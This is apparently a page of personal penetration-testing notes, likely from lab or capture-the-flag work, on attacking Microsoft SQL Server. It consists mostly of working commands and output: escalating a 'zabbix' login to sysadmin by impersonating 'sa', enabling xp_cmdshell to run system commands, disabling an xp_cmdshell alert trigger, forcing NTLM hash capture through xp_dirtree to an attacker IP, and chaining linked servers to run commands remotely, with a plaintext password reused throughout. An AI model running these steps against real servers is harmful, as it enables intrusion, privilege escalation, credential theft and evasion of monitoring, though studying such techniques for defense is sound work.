MSSQL

PowerUpSQL.ps1

#Audit
Invoke-SQLAudit -Instance ZPH-SVRSQL01  -username zabbix -p 'rDhHbBEfh35sMbkY'

#Add user to sysadmin group
Get-SQLQuery -Instance ZPH-SVRSQL01 -Query "EXECUTE AS LOGIN = 'sa'; EXEC SP_ADDSRVROLEMEMBER 'zabbix', 'sysadmin'" -username zabbix -p 'rDhHbBEfh35sMbkY' -verbose

to enableXP_cmdshell

#check xp_cmdshell is enable or not
Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "SELECT value, value_in_use FROM sys.configurations WHERE name='xp_cmdshell';" -username zabbix -p 'rDhHbBEfh35sMbkY' -verbose

#Enable advanced options:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC sp_configure 'show advanced options',1" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Apply configuration changes:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "RECONFIGURE" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Enable xp_cmdshell:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC sp_configure 'xp_cmdshell',1" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Apply configuration changes again:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "RECONFIGURE" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Execute system command (whoami):
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC master..xp_cmdshell 'whoami'" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

output
------
nt service\mssqlserver



*Evil-WinRM* PS C:\Users\jamie\Documents> \/h1

Linked Server

Get-SQLQuery -Instance ZPH-SVRSQL01 -Query "EXEC sp_linkedservers;" -username zabbix -p 'rDhHbBEfh35sMbkY' -Verbose

MSSQL Client

via mssqlclient cheatsheet


# to get version
select @@version;

# to get current server
select @@servername

#current user
select suser_name();

#To List Users
SELECT name FROM master..syslogins

#To List sysadmin privs for all users
SELECT name,sysadmin FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#List database
SELECT name FROM master..sysdatabases;

#to check or permission
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#List table and schema
select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;

#To query a different DB in MSSQL, it’s [server].[db].[schema].[table]

#to list triggers and disable trigger
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server

#If xp_dirtree is enable, we try to catch NTLM hashes via responder
xp_dirtree \\10.10.16.7\test

Database Link

#List the database links
select * from master..sysservers

#enum links
enum_links

#use Link
use_link [DC02.darkzero.ext];

#List server name
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@servername');

#List Version
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@version');

#List sysadmin
select * from openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name,sysadmin FROM master..syslogins');

#List Databases
select * from openquery("WEB\CLIENTS", 'SELECT name FROM master..sysdatabases;');

#List tables
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT * FROM clients.information_schema.tables');

nested database links

#try to have POO_CONFIG run a command on POO_PUBLIC
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''select suser_name();'')')

#To check for permission
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'')')

#xp_cmdshell via EXECUTE
EXECUTE('EXECUTE(''xp_cmdshell whoami'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

Procdure

#List Procedure
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, object_id FROM clients.sys.procedures');

#To check the permission on that Procedure (1 yes/ 0 no)
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT HAS_PERMS_BY_NAME(''clients.dbo.BackupClients'', ''OBJECT'', ''VIEW DEFINITION'') AS CanViewDefinition');

#To check the encryption of procedure
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT OBJECT_NAME(object_id) AS ProcName, OBJECT_DEFINITION(object_id) AS Definition FROM clients.sys.procedures WHERE name = ''BackupClients''');

#to check for assembly files
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, assembly_id, clr_name, permission_set_desc, is_visible FROM clients.sys.assemblies');

PreviousCypher Injection NextBackDrop CMS

Last updated 2 months ago